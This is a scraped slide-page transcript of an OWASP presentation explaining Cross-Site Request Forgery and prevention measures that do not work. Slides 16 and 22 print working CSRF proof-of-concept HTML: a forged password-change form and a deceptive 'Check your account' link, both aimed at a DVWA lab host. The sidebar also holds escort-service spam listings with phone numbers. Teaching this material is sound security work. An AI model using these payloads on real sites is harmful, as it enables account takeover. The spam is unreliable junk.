Cyber security
Cyber securityCyber security
Cyber security
 

Recently uploaded

call girls in Vaishali (Ghaziabad) 🔝 >༒8448380779 🔝 genuine Escort Service 🔝✔️✔️
call girls in Vaishali (Ghaziabad) 🔝 >༒8448380779 🔝 genuine Escort Service 🔝✔️✔️call girls in Vaishali (Ghaziabad) 🔝 >༒8448380779 🔝 genuine Escort Service 🔝✔️✔️
call girls in Vaishali (Ghaziabad) 🔝 >༒8448380779 🔝 genuine Escort Service 🔝✔️✔️Delhi Call girls
 
Try MyIntelliAccount Cloud Accounting Software As A Service Solution Risk Fre...
Try MyIntelliAccount Cloud Accounting Software As A Service Solution Risk Fre...Try MyIntelliAccount Cloud Accounting Software As A Service Solution Risk Fre...
Try MyIntelliAccount Cloud Accounting Software As A Service Solution Risk Fre...MyIntelliSource, Inc.
 
Diamond Application Development Crafting Solutions with Precision
Diamond Application Development Crafting Solutions with PrecisionDiamond Application Development Crafting Solutions with Precision
Diamond Application Development Crafting Solutions with PrecisionSolGuruz
 
A Secure and Reliable Document Management System is Essential.docx
A Secure and Reliable Document Management System is Essential.docxA Secure and Reliable Document Management System is Essential.docx
A Secure and Reliable Document Management System is Essential.docxComplianceQuest1
 
SyndBuddy AI 2k Review 2024: Revolutionizing Content Syndication with AI
SyndBuddy AI 2k Review 2024: Revolutionizing Content Syndication with AISyndBuddy AI 2k Review 2024: Revolutionizing Content Syndication with AI
SyndBuddy AI 2k Review 2024: Revolutionizing Content Syndication with AIABDERRAOUF MEHENNI
 
How To Use Server-Side Rendering with Nuxt.js
How To Use Server-Side Rendering with Nuxt.jsHow To Use Server-Side Rendering with Nuxt.js
How To Use Server-Side Rendering with Nuxt.jsAndolasoft Inc
 
Software Quality Assurance Interview Questions
Software Quality Assurance Interview QuestionsSoftware Quality Assurance Interview Questions
Software Quality Assurance Interview QuestionsArshad QA
 
Short Story: Unveiling the Reasoning Abilities of Large Language Models by Ke...
Short Story: Unveiling the Reasoning Abilities of Large Language Models by Ke...Short Story: Unveiling the Reasoning Abilities of Large Language Models by Ke...
Short Story: Unveiling the Reasoning Abilities of Large Language Models by Ke...kellynguyen01
 
Reassessing the Bedrock of Clinical Function Models: An Examination of Large ...
Reassessing the Bedrock of Clinical Function Models: An Examination of Large ...Reassessing the Bedrock of Clinical Function Models: An Examination of Large ...
Reassessing the Bedrock of Clinical Function Models: An Examination of Large ...harshavardhanraghave
 
The Ultimate Test Automation Guide_ Best Practices and Tips.pdf
The Ultimate Test Automation Guide_ Best Practices and Tips.pdfThe Ultimate Test Automation Guide_ Best Practices and Tips.pdf
The Ultimate Test Automation Guide_ Best Practices and Tips.pdfkalichargn70th171
 
(Genuine) Escort Service Lucknow | Starting ₹,5K To @25k with A/C 🧑🏽‍❤️‍🧑🏻 89...
(Genuine) Escort Service Lucknow | Starting ₹,5K To @25k with A/C 🧑🏽‍❤️‍🧑🏻 89...(Genuine) Escort Service Lucknow | Starting ₹,5K To @25k with A/C 🧑🏽‍❤️‍🧑🏻 89...
(Genuine) Escort Service Lucknow | Starting ₹,5K To @25k with A/C 🧑🏽‍❤️‍🧑🏻 89...gurkirankumar98700
 
Tech Tuesday-Harness the Power of Effective Resource Planning with OnePlan’s ...
Tech Tuesday-Harness the Power of Effective Resource Planning with OnePlan’s ...Tech Tuesday-Harness the Power of Effective Resource Planning with OnePlan’s ...
Tech Tuesday-Harness the Power of Effective Resource Planning with OnePlan’s ...OnePlan Solutions
 
Test Automation Strategy for Frontend and Backend
Test Automation Strategy for Frontend and BackendTest Automation Strategy for Frontend and Backend
Test Automation Strategy for Frontend and BackendArshad QA
 
Advancing Engineering with AI through the Next Generation of Strategic Projec...
Advancing Engineering with AI through the Next Generation of Strategic Projec...Advancing Engineering with AI through the Next Generation of Strategic Projec...
Advancing Engineering with AI through the Next Generation of Strategic Projec...OnePlan Solutions
 
TECUNIQUE: Success Stories: IT Service provider
TECUNIQUE: Success Stories: IT Service providerTECUNIQUE: Success Stories: IT Service provider
TECUNIQUE: Success Stories: IT Service providermohitmore19
 
DNT_Corporate presentation know about us
DNT_Corporate presentation know about usDNT_Corporate presentation know about us
DNT_Corporate presentation know about usDynamic Netsoft
 
How To Troubleshoot Collaboration Apps for the Modern Connected Worker
How To Troubleshoot Collaboration Apps for the Modern Connected WorkerHow To Troubleshoot Collaboration Apps for the Modern Connected Worker
How To Troubleshoot Collaboration Apps for the Modern Connected WorkerThousandEyes
 
Unlocking the Future of AI Agents with Large Language Models
Unlocking the Future of AI Agents with Large Language ModelsUnlocking the Future of AI Agents with Large Language Models
Unlocking the Future of AI Agents with Large Language Modelsaagamshah0812
 

Recently uploaded (20)

Vip Call Girls Noida ➡️ Delhi ➡️ 9999965857 No Advance 24HRS Live
Vip Call Girls Noida ➡️ Delhi ➡️ 9999965857 No Advance 24HRS LiveVip Call Girls Noida ➡️ Delhi ➡️ 9999965857 No Advance 24HRS Live
Vip Call Girls Noida ➡️ Delhi ➡️ 9999965857 No Advance 24HRS Live
 
call girls in Vaishali (Ghaziabad) 🔝 >༒8448380779 🔝 genuine Escort Service 🔝✔️✔️
call girls in Vaishali (Ghaziabad) 🔝 >༒8448380779 🔝 genuine Escort Service 🔝✔️✔️call girls in Vaishali (Ghaziabad) 🔝 >༒8448380779 🔝 genuine Escort Service 🔝✔️✔️
call girls in Vaishali (Ghaziabad) 🔝 >༒8448380779 🔝 genuine Escort Service 🔝✔️✔️
 
Try MyIntelliAccount Cloud Accounting Software As A Service Solution Risk Fre...
Try MyIntelliAccount Cloud Accounting Software As A Service Solution Risk Fre...Try MyIntelliAccount Cloud Accounting Software As A Service Solution Risk Fre...
Try MyIntelliAccount Cloud Accounting Software As A Service Solution Risk Fre...
 
Diamond Application Development Crafting Solutions with Precision
Diamond Application Development Crafting Solutions with PrecisionDiamond Application Development Crafting Solutions with Precision
Diamond Application Development Crafting Solutions with Precision
 
A Secure and Reliable Document Management System is Essential.docx
A Secure and Reliable Document Management System is Essential.docxA Secure and Reliable Document Management System is Essential.docx
A Secure and Reliable Document Management System is Essential.docx
 
SyndBuddy AI 2k Review 2024: Revolutionizing Content Syndication with AI
SyndBuddy AI 2k Review 2024: Revolutionizing Content Syndication with AISyndBuddy AI 2k Review 2024: Revolutionizing Content Syndication with AI
SyndBuddy AI 2k Review 2024: Revolutionizing Content Syndication with AI
 
How To Use Server-Side Rendering with Nuxt.js
How To Use Server-Side Rendering with Nuxt.jsHow To Use Server-Side Rendering with Nuxt.js
How To Use Server-Side Rendering with Nuxt.js
 
Software Quality Assurance Interview Questions
Software Quality Assurance Interview QuestionsSoftware Quality Assurance Interview Questions
Software Quality Assurance Interview Questions
 
Short Story: Unveiling the Reasoning Abilities of Large Language Models by Ke...
Short Story: Unveiling the Reasoning Abilities of Large Language Models by Ke...Short Story: Unveiling the Reasoning Abilities of Large Language Models by Ke...
Short Story: Unveiling the Reasoning Abilities of Large Language Models by Ke...
 
Reassessing the Bedrock of Clinical Function Models: An Examination of Large ...
Reassessing the Bedrock of Clinical Function Models: An Examination of Large ...Reassessing the Bedrock of Clinical Function Models: An Examination of Large ...
Reassessing the Bedrock of Clinical Function Models: An Examination of Large ...
 
The Ultimate Test Automation Guide_ Best Practices and Tips.pdf
The Ultimate Test Automation Guide_ Best Practices and Tips.pdfThe Ultimate Test Automation Guide_ Best Practices and Tips.pdf
The Ultimate Test Automation Guide_ Best Practices and Tips.pdf
 
(Genuine) Escort Service Lucknow | Starting ₹,5K To @25k with A/C 🧑🏽‍❤️‍🧑🏻 89...
(Genuine) Escort Service Lucknow | Starting ₹,5K To @25k with A/C 🧑🏽‍❤️‍🧑🏻 89...(Genuine) Escort Service Lucknow | Starting ₹,5K To @25k with A/C 🧑🏽‍❤️‍🧑🏻 89...
(Genuine) Escort Service Lucknow | Starting ₹,5K To @25k with A/C 🧑🏽‍❤️‍🧑🏻 89...
 
Tech Tuesday-Harness the Power of Effective Resource Planning with OnePlan’s ...
Tech Tuesday-Harness the Power of Effective Resource Planning with OnePlan’s ...Tech Tuesday-Harness the Power of Effective Resource Planning with OnePlan’s ...
Tech Tuesday-Harness the Power of Effective Resource Planning with OnePlan’s ...
 
Test Automation Strategy for Frontend and Backend
Test Automation Strategy for Frontend and BackendTest Automation Strategy for Frontend and Backend
Test Automation Strategy for Frontend and Backend
 
Advancing Engineering with AI through the Next Generation of Strategic Projec...
Advancing Engineering with AI through the Next Generation of Strategic Projec...Advancing Engineering with AI through the Next Generation of Strategic Projec...
Advancing Engineering with AI through the Next Generation of Strategic Projec...
 
TECUNIQUE: Success Stories: IT Service provider
TECUNIQUE: Success Stories: IT Service providerTECUNIQUE: Success Stories: IT Service provider
TECUNIQUE: Success Stories: IT Service provider
 
DNT_Corporate presentation know about us
DNT_Corporate presentation know about usDNT_Corporate presentation know about us
DNT_Corporate presentation know about us
 
How To Troubleshoot Collaboration Apps for the Modern Connected Worker
How To Troubleshoot Collaboration Apps for the Modern Connected WorkerHow To Troubleshoot Collaboration Apps for the Modern Connected Worker
How To Troubleshoot Collaboration Apps for the Modern Connected Worker
 
Unlocking the Future of AI Agents with Large Language Models
Unlocking the Future of AI Agents with Large Language ModelsUnlocking the Future of AI Agents with Large Language Models
Unlocking the Future of AI Agents with Large Language Models
 
Call Girls In Mukherjee Nagar 📱 9999965857 🤩 Delhi 🫦 HOT AND SEXY VVIP 🍎 SE...
Call Girls In Mukherjee Nagar 📱 9999965857 🤩 Delhi 🫦 HOT AND SEXY VVIP 🍎 SE...Call Girls In Mukherjee Nagar 📱 9999965857 🤩 Delhi 🫦 HOT AND SEXY VVIP 🍎 SE...
Call Girls In Mukherjee Nagar 📱 9999965857 🤩 Delhi 🫦 HOT AND SEXY VVIP 🍎 SE...
 

Understanding CSRF

  • 1. CROSS SITE REQUEST FORGERY UNDERSTANDING John Patrick Lita - OWASP Manila Chapter President Venue: Philippine Army, Cyber Security Division, Taguig City
 OWASP Taguig Chapter
  • 2. DEEP UNDERSTANDING WITH CSRF VULNERABILITY MEET THE PRESENTER OWASP Manila Chapter President
 Project Manager at Enterprise Linux Professionals
 Owner of Active Security Training and Consultancy
 Project leader for 
 OWASP Online Academy john.patrick.lita@owasp.org 2
  • 3. DEEP UNDERSTANDING WITH CSRF VULNERABILITY CROSS SITE REQUEST FORGERY Cross-Site Request Forgery (CSRF) is an attack that forces an end user to execute unwanted actions on a web application in which they're currently authenticated. CSRF attacks specifically target state-changing requests, not theft of data, since the attacker has no way to see the response to the forged request. With a little help of social engineering (such as sending a link via email or chat), an attacker may trick the users of a web application into executing actions of the attacker's choosing. If the victim is a normal user, a successful CSRF attack can force the user to perform state changing requests like transferring funds, changing their email address, and so forth. If the victim is an administrative account, CSRF can compromise the entire web application. 3
  • 4. DEEP UNDERSTANDING WITH CSRF VULNERABILITY CSRF ILLUSTRATION 4 C Regular Form CSRF Form Template COMMENT HERE: COMMENT HERE: POST POST
  • 5. DEEP UNDERSTANDING WITH CSRF VULNERABILITY CSRF ILLUSTRATION 5 C Regular Form CSRF Form Template COMMENT HERE: COMMENT HERE: POST POST I AM AWESOME!
  • 6. DEEP UNDERSTANDING WITH CSRF VULNERABILITY CSRF ILLUSTRATION 6 C Regular Form CSRF Form Template COMMENT HERE: COMMENT HERE: POST POST I AM AWESOME! Jaypee: I AM AWESOME!
  • 7. DEEP UNDERSTANDING WITH CSRF VULNERABILITY CSRF ILLUSTRATION 7 C Regular Form CSRF Form Template COMMENT HERE: COMMENT HERE: POST POST I AM NOOB!
  • 8. DEEP UNDERSTANDING WITH CSRF VULNERABILITY CSRF ILLUSTRATION 8 C Regular Form CSRF Form Template COMMENT HERE: COMMENT HERE: POST POST I AM NOOB!
  • 9. DEEP UNDERSTANDING WITH CSRF VULNERABILITY CSRF ILLUSTRATION 9 C Regular Form CSRF Form Template COMMENT HERE: COMMENT HERE: POST POST I AM NOOB! Jaypee: I AM NOOB!
  • 10. DEEP UNDERSTANDING WITH CSRF VULNERABILITY CANNOT READ THE ANTI-CSRF 10
  • 11. DEEP UNDERSTANDING WITH CSRF VULNERABILITY NO SERVER SIDE VALIDATION 11
  • 12. DEEP UNDERSTANDING WITH CSRF VULNERABILITY REVIEWING THE FORM 12
  • 13. DEEP UNDERSTANDING WITH CSRF VULNERABILITY THE CHECKING THE SOURCE CODE 13
  • 14. CSRF DEMO DEEP UNDERSTANDING WITH CSRF VULNERABILITY
  • 15. PREVENTION MEASURES THAT DO NOT WORK CSRF TEMPLATE WEB INTERFACE Try to copy the code of the CSRF Template and save it as HTML File. then open the file with any 
 browser you like. then click the submit and analyse the behaviour.
 
 After that try yo login. please proceed to next page for source code. Page 16 15
  • 16. PREVENTION MEASURES THAT DO NOT WORK CSRF TEMPLATE SOURCE CODE <!DOCTYPE html> <html>
 <head>
 <title>CSRF Template</title>
 </head>
 <body>
 <br> <form action="http://172.16.157.129/dvwa/vulnerabilities/csrf/?" method="GET"> New Password:<br>
 <input type="password" AUTOCOMPLETE="off" name="password_new" value="12345"><br>
 Confirm New Password: <br>
 <input type="password" AUTOCOMPLETE="off" name="password_conf" value="12345"><br>
 <input type="submit" value="Change" name="Change">
 
 </form>
 </body>
 </html> 16
  • 17. PREVENTION MEASURES THAT DO NOT WORK PREVENTION MEASURES THAT DO NOT WORK ▸ Using a secret cookie ▸ Remember that all cookies, even the secret ones, will be submitted with every request. All authentication tokens will be submitted regardless of whether or not the end-user was tricked into submitting the request. Furthermore, session identifiers are simply used by the application container to associate the request with a specific session object. The session identifier does not verify that the end-user intended to submit the request. 17
  • 18. PREVENTION MEASURES THAT DO NOT WORK PREVENTION MEASURES THAT DO NOT WORK ▸ Only Accept POST requests ▸ Applications can be developed to only accept POST requests for the execution of business logic. The misconception is that since the attacker cannot construct a malicious link, a CSRF attack cannot be executed. Unfortunately, this logic is incorrect. There are numerous methods in which an attacker can trick a victim into submitting a forged POST request, such as a simple form hosted in an attacker's Website with hidden values. This form can be triggered automatically by JavaScript or can be triggered by the victim who thinks the form will do something else. POST
 REQUEST 18
  • 19. PREVENTION MEASURES THAT DO NOT WORK PREVENTION MEASURES THAT DO NOT WORK ▸ Multi-Step Transaction
 Multi-Step transactions are not an adequate prevention of CSRF. As long as an attacker can predict or deduce each step of the completed transaction, then CSRF is possible. ▸ URL Rewriting
 This might be seen as a useful CSRF prevention technique as the attacker cannot guess the victim's session ID. However, the user’s session ID is exposed in the URL. We don't recommend fixing one security flaw by introducing another. ▸ HTTPS
 HTTPS does nothing to defend against CSRF. 19
  • 20. CSRF DEMO DEEP UNDERSTANDING WITH CSRF VULNERABILITY
  • 21. PREVENTION MEASURES THAT DO NOT WORK CSRF ATTACK USING SOCIAL ENGINEERING One of the technique or attack vector is to perform a click jacking attack, to test this attack please 
 proceed on the next page for the source code, then try to executing it by clicking the “Click Here!” 21
  • 22. PREVENTION MEASURES THAT DO NOT WORK CSRF ATTACK USING SOCIAL ENGINEERING <!DOCTYPE html> <html>
 <title>Please Check your Account Here!</title>
 <head>Check your account Here!</head>
 <body> <a href="http://172.16.157.129/dvwa/vulnerabilities/csrf/? password_new=password&password_conf=password&Change=Change#">Click Here!</a>
 
 </body>
 </html>